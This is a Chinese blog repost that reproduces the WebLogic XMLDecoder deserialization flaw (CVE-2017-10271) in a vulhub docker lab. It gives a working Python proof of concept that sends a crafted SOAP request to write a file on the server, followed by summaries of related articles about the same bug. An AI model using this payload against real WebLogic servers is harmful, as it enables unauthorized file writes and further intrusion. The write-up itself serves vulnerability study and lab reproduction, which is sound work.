WebLogic XMLDecoder反序列化漏洞复现

最新推荐文章于 2025-03-17 17:52:05 发布
最新推荐文章于 2025-03-17 17:52:05 发布
阅读量186 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: git java 数据库
原文链接:http://www.cnblogs.com/zhaijiahui/p/8179115.html
本文介绍如何复现 WebLogic 的 XMLDecoder 反序列化漏洞,并提供了具体的步骤及验证方法。通过搭建环境并运行提供的 Python 代码,可以验证目标 WebLogic 服务器是否受到该漏洞的影响。

WebLogic XMLDecoder反序列化漏洞复现

 

参考链接: https://bbs.ichunqiu.com/thread-31171-1-1.html

 

git clone https://github.com/vulhub/vulhub.git

cd vulhub/weblogic/ssrf/

docker-compose up -d

 

这时我们就可以访问docker中weblogic的地址,地址为ubuntu(IP):7001,访问 http://192.168.126.142:7001/ 如下图搭建成功。

 

 

检验POC

import requests
headers = { 'Content-type': 'text/xml' }
data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
            <soapenv:Header>
                <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
                    <java><java version="1.4.0" class="java.beans.XMLDecoder">
                        <object class="java.io.PrintWriter">
                            <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/weblogic.txt</string>
                            <void method="println"><string>Weblogic_Test</string></void><void method="close"/>
                        </object>
                    </java></java>
                </work:WorkContext>
            </soapenv:Header>
            <soapenv:Body/>
        </soapenv:Envelope>'''
def exp(ip):
    # ip = ip.strip("\n")
    url_post = ip + "/wls-wsat/CoordinatorPortType11"
    url_myfile = ip + "/bea_wls_internal/weblogic.txt"
    # print("Test for " + ip + ".....")
    r = requests.post(url=url_post,data=data,headers=headers)
    r2 = requests.get(url_myfile)
    if r2.status_code != 404:
        print("Weblogic Vulnerable!!!")
        print("You file path is " + url_myfile)
    else:
        print("No Vulnerable!!!")
    # print("=================================================")

if __name__ == '__main__':
    # Weblogic_IP_list = []
    # with open("weblogic.txt") as f:
    #     Weblogic_IP_list = f.readlines()
    # for ip in Weblogic_IP_list:
    #     exp(ip)
    ip = "http://192.168.126.142:7001"
    exp(ip)

 

 

在/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/weblogic.txt目录下生成weblogic.txt,访问证明漏洞存在

 

 

复现完成。

转载于:https://www.cnblogs.com/zhaijiahui/p/8179115.html

WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)
李同學的安全圈
11-11 566
WebLogic是美国Oracle公司出品的一个 application server,确切的说是一个基于JAVAEE架构的中间件,Weblogic适用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。这里其实也就是weblogic中的WLS组件接收到SOAP格式的请求后,未对解析xml后的类,参数等进行处理,一系列传入最后执行了触发调用了类中的方法,产生漏洞
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271复现)
薛定谔嘚喵博客
05-07 925
CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。漏洞触发url漏洞本质:主要是由于wls组件使用了webservice来请求soap请求,所以通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令。
Weblogic XMLDecoder 反序列化漏洞复现(CVE-2017-10271)
DaWan
09-21 1306
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)环境搭建漏洞验证反弹shellPOC上传文件POC 环境搭建 使用vulhub进行环境搭建,具体步骤可参考这里。 启动成功 漏洞验证 访问http://IP:PORT/wls-wsat/CoordinatorPortType11,在挖洞的时候访问此地址出现如下页面则大概率都是存在这个漏洞的 反弹shellPOC POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: X.X.
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析
weixin_34138255的博客
11-09 315
12月22号,绿盟科技博客发布一篇文章,里面有提及到weblogic由于存在0day漏洞,导致被植入恶意软件用来挖掘比特币。后来经过确认,这次攻击者所用的漏洞CVE编号为CVE-2017-10271,那么这个漏洞究竟是怎样造成的? 0. 分析环境 IDE:Intellij IDEA 中间件版本: weblogic 10.3.6【未进行任何补丁修复...
Weblogic XMLDecoder(CVE-2017-10271)反序列化漏洞复现
weixin_60329395的博客
07-27 583
Weblogic的WLSSecurity组件对外提供服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。通过发送构造的xml数据能通过反弹shell拿到权限
WebLogic历史漏洞代码审计(二):WebLogic-XMLDecoder反序列化漏洞分析
weixin_50600251的博客
08-13 2103
1、利用xml decoded反序列化进行远程代码执行的漏洞,例如:2、利用java反序列化进行远程代码执行的漏洞,例如:2018-2894本章主要讲CVE-2017-10271,CVE-2017-3506的代码分析以上一篇文章搭建的CVE-2017-10271审计环境为例,我将CVE-2017-10271的利用链分为两部分第一部分利用链为WorkContextServerTube#processRequest到WorkContextXmlInputAdapter#readUTF。
Weblogic_XMLDecoder反序列化漏洞_CVE-2017-10271(未完待续)
simonnews的博客
05-14 365
Weblogic_XMLDecoder反序列化漏洞_CVE-2017-102711 漏洞概述1.1 基础知识1.2 漏洞概述1.3 影响版本2 漏洞原理分析3 漏洞复现4 漏洞修复5 其他6 参考 1 漏洞概述 1.1 基础知识 1.2 漏洞概述 1.3 影响版本 webLogic 10.3.6.0、12.1.3.0、12.2.1.1 、12.2.1.2版本 2 漏洞原理分析 调用栈 weblogic.wsee.jaxws.workcontext.WorkContextServerTube->p
Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)
SoulCat
02-12 2675
Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271) 漏洞概述: -该漏洞产生于WLS-WebServices这个核心组件中,因为它使用XMLDecoder来解析XML数据,直接构造payload,发送xml数据,即可利用该漏洞,上传webshell等等。 漏洞版本: 10.3.6.0.0,12.2.1.1.0,12.2.1.2.0,12.1.3.0.0 漏洞搭建...
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)
huangyongkang666的博客
07-25 1371
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)
java 反序列化漏洞 weblogic版本_WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析...
weixin_29868343的博客
03-07 238
12月22号,绿盟科技博客发布一篇文章,里面有提及到weblogic由于存在0day漏洞,导致被植入恶意软件用来挖掘比特币。后来经过确认,这次***者所用的漏洞CVE编号为CVE-2017-10271,那么这个漏洞究竟是怎样造成的?0. 分析环境IDE:Intellij IDEA中间件版本: weblogic 10.3.6【未进行任何补丁修复】发包工具: brupsuite1. 漏洞成因我们先来看...
Weblogic XML反序列化漏洞检查工具CVE-2017-10271
02-22
Weblogic XML反序列化漏洞检查工具CVE-2017-10271,用于网络管理员发现网络中存在的Weblogic XML反序列化漏洞,及时进行修补
Weblogic+XML反序列化漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
CVE重要漏洞复现WeblogicXMLDecoder反序列化
最新发布
没有网络安全就没有国家安全
03-17 1222
CVE重要漏洞复现WeblogicXMLDecoder反序列化
序列化配置is_WebLogicXMLDecoder反序列化漏洞分析
weixin_28940939的博客
01-14 66
更多全球网络安全资讯尽在邑安全XMLEncoder&XMLDecoderXMLDecoder/XMLEncoder 是在JDK1.4版中添加的 XML 格式序列化持久性方案,使用 XMLEncoder 来生成表示 JavaBeans 组件(bean)的 XML 文档,用 XMLDecoder 读取使用 XMLEncoder 创建的XML文档获取JavaBeans。XMLEncod...
Weblogic XMLDecoder 反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
05-20 3762
本文介绍了Weblogic XMLDecoder反序列化相关的漏洞原理和poc的构造,并以CVE-2017-10271为例在vulhub上进行了复现。有关Weblogic XMLDecoder反序列化漏洞包括CVE-2017-3506、CVE-2017-10271、CVE-2019-2725、CVE-2019-2729等,其漏洞原理相似,本文对此进行了简要介绍。
WebLogic漏洞复现(附带修复方法)
C233333235的博客
08-07 2675
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
WebLogic 反序列化漏洞(CVE-2019-2890)
午夜安全
10-20 3485
WebLogic 反序列化漏洞(CVE-2019-2890) 漏洞描述 2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞漏洞编号为CVE-2019-2890。 Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic反序列化黑名单,使攻击者可以...
Weblogic反序列化漏洞修复
sinosoft5876的博客
10-22 871
Weblogic反序列化在各大论坛的讨论一直是轰轰烈烈的,引发本漏洞其实并不能怪java反序列化机制. 测试漏洞存在,应朋友的要求帮忙做个补救,翻遍网上大牛们的技术贴,有两种临时补救的方法,但是尝试过之后对应用有影响,放弃! 今天找到某牛写的贴子,里面提到可以自己禁止JVM执行系统命令,经过一番研究,写了个servlet放在系统里面跑了一下,成功防御,直接贴出代码: import ...
weblogic反序列化漏洞复现-XMLDecoder(CVE-2017-10271)
yang1234567898的博客
04-21 1244
漏洞原因 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 影响版本 10.3.6 12.1.3 12.2.1.1.0 12.2.1.2. 漏洞复现 启动vulhub靶场 看到上面的页面说明启动成功 先开启监听 然后发送下面的数据包(反弹语句需要编码): POST /wls-wsat/CoordinatorPortTy.
weblogic 反序列化漏洞复现
02-11
### 复现 WebLogic 反序列化漏洞 为了在受控环境中复现 WebLogic反序列化漏洞,环境准备至关重要。建议在一个隔离的实验环境下操作,比如通过虚拟机搭建包含已知漏洞版本的 WebLogic 服务[^3]。 #### 准备工作 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值